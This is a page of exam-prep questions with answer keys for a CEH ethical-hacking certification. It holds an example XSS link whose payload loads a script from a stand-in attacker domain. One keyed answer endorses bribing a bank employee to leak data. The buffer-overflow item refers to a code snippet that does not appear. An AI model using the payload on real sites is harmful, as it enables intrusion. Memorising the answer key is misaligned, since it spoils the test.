Free CEH-001 Exam Braindumps (page: 49)

Page 48 of 220

How does a denial-of-service attack work?

  1. A hacker prevents a legitimate user (or group of users) from accessing a service
  2. A hacker uses every character, word, or letter he or she can think of to defeat authentication
  3. A hacker tries to decipher a password by using a system, which subsequently crashes the network
  4. A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Answer(s): A



You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed?

  1. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
  2. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly- paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
  3. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100, 000 or more "zombies" and "bots"
  4. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Answer(s): B



This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/bad script.js%22%3E%3C/script%3E">See foobar</a>

What is this attack?

  1. Cross-site-scripting attack
  2. SQL Injection
  3. URL Traversal attack
  4. Buffer Overflow attack

Answer(s): A



Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet:



How can you protect/fix the problem of your application as shown above?

  1. Because the counter starts with 0, we would stop when the counter is less than 200
  2. Because the counter starts with 0, we would stop when the counter is more than 200
  3. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data
  4. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data

Answer(s): A,D






Post your Comments and Discuss GAQM CEH-001 exam with other Community members:

CEH-001 Discussions & Posts